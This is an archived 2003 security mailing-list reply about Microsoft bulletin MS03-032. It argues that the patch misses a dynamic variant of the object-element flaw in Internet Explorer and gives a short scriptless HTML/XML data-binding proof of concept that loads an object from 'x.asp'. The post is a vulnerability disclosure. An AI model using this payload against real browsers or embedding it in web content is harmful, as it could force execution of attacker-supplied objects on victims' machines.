[VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032

From: GreyMagic Software (securityat_private)
Date: Mon Sep 08 2003 - 07:52:12 PDT

Next message: NSFOCUS Security Team: "[VulnWatch] NSFOCUS SA2003-06 : Microsoft Windows RPC DCOM Interface Heap Overflow Vulnerability"

Previous message: pokleyzz: "[VulnWatch] [SCAN Associates Sdn Bhd Security Advisory] Foxweb 2.5 bufferoverflow in CGI and ISAPI extension"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>The patch for Drew's object data=funky.hta doesn't work:

This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.

>1. Disable Active Scripting

This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.

Next message: NSFOCUS Security Team: "[VulnWatch] NSFOCUS SA2003-06 : Microsoft Windows RPC DCOM Interface Heap Overflow Vulnerability"
Previous message: pokleyzz: "[VulnWatch] [SCAN Associates Sdn Bhd Security Advisory] Foxweb 2.5 bufferoverflow in CGI and ISAPI extension"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Sep 08 2003 - 08:42:08 PDT